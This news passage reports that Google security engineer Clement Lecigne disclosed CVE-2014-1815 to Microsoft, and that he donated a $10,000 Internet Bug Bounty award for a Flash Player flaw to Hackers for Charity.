CVE-2014-1815 was reported to Microsoft by Clement Lecigne, a security engineer who works for Google in its Swiss office.

Lecigne made news three months ago when he was awarded $10,000 by the Internet Bug Bounty (IBB), a new program funded by Facebook and Microsoft. IBB cut Lecigne the check for finding a critical vulnerability in Adobe’s Flash Player. Lecigne donated the $10,000 to the Hackers for Charity non-profit.